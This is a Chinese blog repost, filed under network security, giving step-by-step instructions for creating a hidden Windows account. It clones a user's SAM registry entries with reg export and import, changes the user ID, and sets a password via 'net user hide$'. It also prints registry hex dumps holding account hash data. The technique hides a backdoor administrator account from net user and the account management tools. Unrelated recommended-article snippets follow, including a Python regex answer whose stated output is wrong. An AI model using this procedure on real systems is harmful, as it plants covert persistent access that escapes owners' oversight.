Windows Create Hide User

最新推荐文章于 2021-06-18 22:19:07 发布
最新推荐文章于 2021-06-18 22:19:07 发布
阅读量1.1k 收藏
点赞数
分类专栏: 网络安全 文章标签: 隐藏账号密码 windows


转自:http://codeliker.github.io/hack/2014/11/22/windows-create-hide-user/


Windows Create Hide User windows 建立隐藏账户(适用于XP、WIN7等)

22 November 2014

Overview

使用注册表操作,可以添加隐藏账户,在cmd下,net usernet localgroup administrators命令看不到。账户界面中也看不到,用户和组中也看不到该用户。只有注册表中可以看到。该方法实际上就是通过注册表来克隆用户。

基础知识介绍及原理说明

1.hklm\sam\sam赋予管理员完全控制权限或者以system权限运行命令;

2.HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names中存储的是用户账户,每个账户里面的内容对应其类型,如0x14f0x3e8等,即用户ID,如:

	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\2008

	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\Administrator

	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\Guest

	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\test

3.每个账户的类型(即ID)对应HKEY_LOCAL_MACHINE\sam\sam\domains\account\users下相应的子键,如0x1f4对应HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000001F4HKEY_LOCAL_MACHINE\sam\sam\domains\account\users内容示例:

	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000001F4
	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000001F5
	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000003E8
	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000003E9
	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\Names

4.ID对应的子键中存储了账户的信息,F项存储其权限相关信息,V存储了其上次登录时间、修改密码、密码HASH等值。内容示例如下:

	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000001F4
	F    REG_BINARY    02000100000000008ACABCE62E89CB010000000000000000000000000000000000000000000000000000000000000000F401000001020000100000000000000000000600010000000000000031003100
	V    REG_BINARY    00000000BC00000002000100BC0000001A00000000000000D80000000000000000000000D80000001A00000000000000F40000000000000000000000F40000000000000000000000F40000000000000000000000F40000000000000000000000F40000000000000000000000F40000000000000000000000F40000000000000000000000F400000015000000A80000000C01000008000000010000001401000004000000000000001801000014000000000000002C0100000400000000000000300100000400000000000000010014809C000000AC0000001400000044000000020030000200000002C014004400050101010000000000010000000002C01400FFFF1F000101000000000005070000000200580003000000000014005B03020001010000000000010000000000001800FF070F000102000000000005200000002002000000002400440002000105000000000005150000008D86E99B38BC9047FE2ACA9DF40100000102000000000005200000002002000001020000000000052000000020020000410064006D0069006E006900730074007200610074006F0072006400A17B0674A18B977B3A672800DF572900847685516E7F105E37627500FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00010001020000070000000300010003000100A3B16F6C86F546A2D693FF6D6A854B2D0300010003000100

5.Windows实际登录时是根据上述表项确定用户是否存在、用户权限、用户信息等的。因此,通过克隆某用户的相关注册表项,即可达到克隆账户目录,从而建立隐藏账户。不过,需要注意的时,克隆出来的用户ID不能已经存在,也就是说我们需要修改用户ID。

操作方法

1.假设我们要克隆2008这个用户。先导出该用户的type(即ID):

	reg export hklm\sam\sam\domains\account\users\names\2008 hide.reg

这样,就把2008type导出到了hide.reg中,其内容为:

	Windows Registry Editor Version 5.00


	[HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\2008]

	@=hex(3e8):

2.导出该用户type对应的注册表项:

	 reg export hklm\sam\sam\domains\account\users\000003e8 hide_type.reg

这样就把2008的用户信息导出到了hide_type.reg中,其内容为:

	Windows Registry Editor Version 5.00

	[HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000003e8]

	"F"=hex:02,00,01,00,00,00,00,00,5f,50,d4,48,0c,06,d0,01,00,00,00,00,00,00,00,\

	00,82,36,49,6a,61,ea,cf,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  		
	e8,03,00,00,01,02,00,00,14,00,00,00,56,00,a8,03,00,00,05,00,01,00,00,00,00,\
  		
	00,a5,00,00,00,00,00

	"V"=hex:00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,08,00,00,00,00,00,00,\
  
	00,c4,00,00,00,00,00,00,00,00,00,00,00,c4,00,00,00,00,00,00,00,00,00,00,00,\
  
	c4,00,00,00,00,00,00,00,00,00,00,00,c4,00,00,00,00,00,00,00,00,00,00,00,c4,\
  	
	00,00,00,00,00,00,00,00,00,00,00,c4,00,00,00,00,00,00,00,00,00,00,00,c4,00,\
  
	00,00,00,00,00,00,00,00,00,00,c4,00,00,00,00,00,00,00,00,00,00,00,c4,00,00,\

	00,00,00,00,00,00,00,00,00,c4,00,00,00,15,00,00,00,a8,00,00,00,dc,00,00,00,\
	
	08,00,00,00,01,00,00,00,e4,00,00,00,04,00,00,00,00,00,00,00,e8,00,00,00,14,\
  		
	00,00,00,00,00,00,00,fc,00,00,00,04,00,00,00,00,00,00,00,00,01,00,00,04,00,\
	
	00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00,00,44,00,00,\

	00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\

	00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
	
	00,58,00,03,00,00,00,00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00,\

	00,00,8d,86,e9,9b,38,bc,90,47,fe,2a,ca,9d,e8,03,00,00,00,00,18,00,ff,07,0f,\

	00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,5b,03,02,00,\

	01,01,00,00,00,00,00,01,00,00,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,\

	02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,32,00,30,00,30,00,\

	38,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,00,01,\

	00,01,02,00,00,07,00,00,00,03,00,01,00,03,00,01,00,09,e1,bc,25,9c,07,0f,57,\

	83,45,56,0f,ab,17,44,60,03,00,01,00,03,00,01,00

3.由于我们是要克隆该用户,需要修改其type(避免用户ID重复),也就是hide.reghex()里面的内容,并且需要把hide.reg中的2008改为我们想要的账户名,例如hide$,然后将hide_type.regHKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000003e8000003e8改为我们设定的值,也就是修改了的type。假设我们改为0x400

4.导入 修改过的 hide.reg 和 hide_type.reg 到注册表中去:

	reg import hide.reg

	reg import hide_type.reg

这样,就克隆了2008这个用户了,其用户名为hide$,ID0x400。由于这里的注册表项存储的HASHID关联,当修改了ID之后,用户HASH随之改变了,也就是说密码与原用户密码不同。因此,克隆完后,需要修改hide$的密码

	net user hide$ P@ssw0rd

这样,就只有注册表能看到该用户了。

几点说明

1.对于2008服务器而言,登录界面会出现两个2008用户,点哪个登录都是登陆的2008

2.如果操作过程中ID没有更改或者其他地方失误,可能会导致用户组中存在用户;

3.由于ID变了HASH也就变了,因此需要修改新用户的密码;

4.用户名需要是尾部为’$’的用户名,如果没有, net user 能看到该用户。



寒江雪语
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
对话框隐藏的几种方法
Johnny的专栏
07-22 2014
有很多应用程序要求一起动就隐藏起来,这些程序多作为后台程序运行,希望不影响其他窗口,往往只在托盘区显示一个图标。这些程序通常都是对话框程序,而对话框在初始化的过程上与SDI、MDI的初始化是不同的,对话框只需要DoModule或者是CreateDialog等等对话框函数调用一次便可,SDI、MDI则要好几步才行。这样看来,对话框在使用方法上面是隐藏了不少细节的,其中就没有SDI、MDI所要求的Sh
CreateWindowEx()自定义窗口句柄,消息处理
Acheld的博客
03-21 1752
// /*************************************************** MyWnd.h -- MACRO Definition of the wnd ,Can be used anywhere U Want version 1.0.8, March 21th, 2016 Copyright (C) 2015-2016 Acheld CHEN
注册表中查看隐藏用户SAM
luminous_you的博客
10-13 6330
执行 regedit 命令进注册表,在 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names 若文件夹为空 修改权限
[VC++]控制台程序窗口隐藏
wawj522527的专栏
09-05 9795
HWND   hWnd;     SetConsoleTITle("HEHE");     hWnd=::FindWindow(NULL,"HEHE");     ShowWindow(hWnd,SW_HIDE);  当创建一个控制台程序时,又不想看到其窗口可用如下代码解决: #ifdef NDEBUG #pragma comment( linker, "/subs
XPUserHide.exe
07-25
管理windows xp 登陆用户 ,可以隐藏或显示本机所有用户。
XPhide
03-06
XPhide
windows的技巧操作
01-19
具体操作为:找到位于`C:\Windows\inf`目录下的`sysoc.inf`文件,并使用文本编辑器打开,然后在需要隐藏的组件前添加`hide`标记,例如`hide;`,之后保存文件。这样做之后,指定的系统组件就会被隐藏起来,不再出现在...
20个有趣的windows XP技巧.docx
09-26
4. 查看隐藏的系统组件: 编辑`sysoc.inf`文件,删除“hide”关键词后,通过“控制面板”> “添加/删除程序”> “添加或删除Windows组件”,可以看到所有系统软件,包括通常隐藏的如Windows Messenger,可以进行卸载...
15个有趣的windows XP技巧.docx
09-26
4. 修改`sysoc.inf`文件显示隐藏组件:编辑`/windows/inf/sysoc.inf`文件,去除“hide”关键字,然后在“添加/删除程序”中,用户可以看到并卸载原本隐藏的系统组件,如Windows Messenger。 5. 利用命令行工具:...
AdvCam-Hide-Adv-with-Natural-Styles
05-18
conda create -n advcam_env python=3.6 source activate advcam_env 激活虚拟环境后: git clone https://github.com/RjDuan/AdvCam-Hide-Adv-with-Natural-Styles cd AdvCam-Hide-Adv-with-Natural-Styles pip ...
windows下使应用程序获得管理员权限办法
08-31
CREATE_NEW_CONSOLE | NORMAL_PRIORITY_CLASS, // creation flags NULL, // environment block NULL, // current directory &si, // startup info &pi) // process info ) { // handle error } ``` 对于C#...
win10开机本地帐户_如何在Windows 10中创建新的本地用户帐户
culinxia2707的博客
09-06 2084
win10开机本地帐户When you upgrade Windows 10 your old account comes with you, when you do a clean install you make a new account during the process, but what about if you want to add additional local accoun...
计算机隐藏用户设置,Win10电脑怎么设置隐藏账户?电脑如何设置隐藏账户?
weixin_42442651的博客
06-18 1001
如何在Win10系统中设置隐藏帐户?无论原因如何,如果用户需要在Win10系统中设置隐藏帐户,则无法看到启动登录界面。您可以使用注册表设置帐户以实现隐藏帐户的目的。有关详细信息,请参阅下文。如何在Win10系统中设置隐藏帐户?教程/方法默认情况下,Win10将在登录屏幕上显示所有帐户的全名。要隐藏帐户,您必须找到相应的用户名。可以在本地用户和组lusrmgr.msc中查看此对应关系,但此方法不适用...
隐藏窗口(hide window)
灵魂之栖
12-07 3051
// Hide the window of wow.exe with typing  "hide.exe" // Then show it with typing "hide.exe s" #include int main( int argc,char *argv[]) {     HWND hWnd;     hWnd=FindWindow(NULL,"魔兽世界");
WIN10 隐藏Administrator账户的方法
fortyman的博客
04-18 7951
1.首先在Windows10桌面,右键点击开始按钮,然后在弹出菜单中选择“运行”菜单项 2.运行窗口中输入命令netplwiz,然后点击确定按钮 ! 3.这时会打开用户账户窗口,在这里可以看到本机用户的列表,记录一下我们要关闭的Administrator账户的全名(注意大小写) 4.再次打开运行窗口,然后输入命令regedit,点击确定按钮运行该命令 5.在打开的注册表编辑器窗口中定位到HKEY_...
注册表 SAM
GeneralYY0的专栏
05-10 7368
注册表 SAM 这个是在一次服务器的维护中找到的资料,比较有用,也不知道放哪里,就放"下班时光"吧 这篇文章主要是说明一下Windows系统下的用户和组在注册表中的存放位置与存放内容.实际的用处不是很多,主要是让我们大家可以更多的了解Windows注册表. 好了,多于的话就说到这里,下面就让我带着大家走进Windows注册表的SAM里吧...... ////////
[原创]隐藏用户名出现在Windows XP欢迎画面
weixin_34059951的博客
04-27 195
安装完用友U8,多了一个UF_OLAP_USER用户出现在了Windows XP欢迎画面,特整理以下方法。 HideUser.cmd -------------------------------------------------------------------------------- @COLOR 0b@TITLE 隐藏用户名出现在欢迎画面@NET USER@SET /P Us...
['<field name="name"/>', '<field name="location_id" options="{\'no_create\': True}" string="来自" groups="stock.group_stock_multi_locations" optional="show"/>', '<field name="location_dest_id" options="{\'no_create\': True}" string="至" groups="stock.group_stock_multi_locations" optional="show"/>', '<field name="partner_id" optional="show"/>', '<field name="user_id" optional="hide"/>', '<field name="scheduled_date" optional="show"/>', '<field name="origin" optional="show"/>', '<field name="backorder_id" optional="hide"/>', '<field name="state" optional="show"/>', '<field name="priority" optional="hide"/>', '<field name="picking_type_id" optional="hide"/>', '<field name="company_id" groups="base.group_multi_company" optional="show"/>', '<field name="activity_exception_decoration" widget="activity_exception"/>']如何获列表中name=""中引号中的内容,引号有可能是单引号或者双引号
最新发布
07-20
要从给定的字符串列表中获取`name=""`中引号中的内容,可以使用正则表达式方法。以下是一个示例代码片段,可以在Python中使用re模块来实现: ```python import re def extract_names_from_list(lst): names = [] pattern = r'name=(\'|")([^\'"]*?)\1' for string in lst: matches = re.findall(pattern, string) for match in matches: names.append(match[1]) return names # 示例用法 string_list = ['<field name="name"/>', '<field name="location_id" options="{\'no_create\': True}" string="来自" groups="stock.group_stock_multi_locations" optional="show"/>', '<field name="location_dest_id" options="{\'no_create\': True}" string="至" groups="stock.group_stock_multi_locations" optional="show"/>', '<field name="partner_id" optional="show"/>', '<field name="user_id" optional="hide"/>', '<field name="scheduled_date" optional="show"/>', '<field name="origin" optional="show"/>', '<field name="backorder_id" optional="hide"/>', '<field name="state" optional="show"/>', '<field name="priority" optional="hide"/>', '<field name="picking_type_id" optional="hide"/>', '<field name="company_id" groups="base.group_multi_company" optional="show"/>', '<field name="activity_exception_decoration" widget="activity_exception"/>'] names = extract_names_from_list(string_list) print(names) ``` 在这个示例中,我们定义了一个`extract_names_from_list()`函数,它接受一个字符串列表作为输入。然后,我们使用正则表达式模式`r'name=(\'|")([^\'"]*?)\1'`来匹配引号中的内容。其中`(\'|")`表示匹配单引号或双引号,`([^\'"]*?)`表示匹配除了单引号和双引号之外的任意字符(非贪婪模式),`\1`表示与第一个括号内的内容相匹配(即匹配到的引号类型)。 我们使用`re.findall()`函数来查找所有匹配的结果,并使用循环将匹配到的内容添加到名字列表中。最后,返回名字列表。 请注意,如果字符串中没有匹配到引号内容,将会被忽略。在示例中,只有`<field name="name"/>`匹配到了引号内容,因此只有一个结果被添加到名字列表中。输出结果将会是`['name']`。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值